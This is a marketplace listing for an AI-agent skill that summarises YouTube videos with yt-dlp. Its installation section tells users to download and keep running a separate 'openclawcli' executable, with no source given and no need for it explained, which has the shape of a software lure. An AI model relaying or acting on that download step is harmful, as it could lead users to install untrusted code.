youtube-summarize
Summarize YouTube videos by extracting transcripts and captions. Use when you need to get a quick summary of a video, extract key points, or analyze video content without watching it.
Why use this skill?
Use the youtube-summarize skill to extract video transcripts and get instant AI summaries, key takeaways, and analysis without watching long videos.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/jordanprater/youtube-summarizeWhat This Skill Does
The youtube-summarize skill is a powerful OpenClaw agent capability designed to bridge the gap between long-form video content and concise text analysis. By leveraging the industry-standard yt-dlp tool alongside the required openclawcli utility, this skill programmatically extracts, cleans, and formats YouTube captions and transcripts. Once the raw subtitle data is processed into clean, human-readable text, it can be passed directly to the AI agent for summarization, key point extraction, or in-depth content analysis. This allows users to consume complex video information without the necessity of watching or listening to the media files.
Installation
Installation is a two-step process requiring both the yt-dlp package and the essential openclawcli tool. First, ensure you have Python installed and run pip install yt-dlp to fetch the downloader. Second, visit the official repositories to download the appropriate openclawcli executable for your operating system (Windows or macOS). It is critical that the openclawcli service is running locally before attempting any transcript extraction, as it acts as the bridge for external subtitle processing.
Use Cases
This skill is ideal for researchers needing to cite video content, students analyzing long educational lectures, and professionals who need to quickly grasp the takeaways from industry webinars or product tutorials. It is perfect for turning hours of video footage into a two-minute read.
Example Prompts
- "Summarize this video: https://www.youtube.com/watch?v=dQw4w9WgXcQ and list the three most important takeaways."
- "Extract the transcript from this tech tutorial and highlight any commands mentioned in the video."
- "Analyze the following YouTube video link to provide a bulleted summary of the speaker's main arguments."
Tips & Limitations
Note that this skill relies on the presence of closed captions or auto-generated subtitles. If a video has subtitles disabled or lacks audio, transcript extraction will fail. Always verify that your network allows the execution of yt-dlp and that you have sufficient disk permissions for the file writing process. For the best accuracy, prioritize videos with manual captions over auto-generated ones.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-jordanprater-youtube-summarize": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, file-write, file-read, code-execution
Related Skills
clawhub
clawhub
openclaw
openclaw
telegram-create-bot
Build and manage Telegram bots via the Telegram Bot API. Create bots, send messages, handle webhooks, manage groups and channels.
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.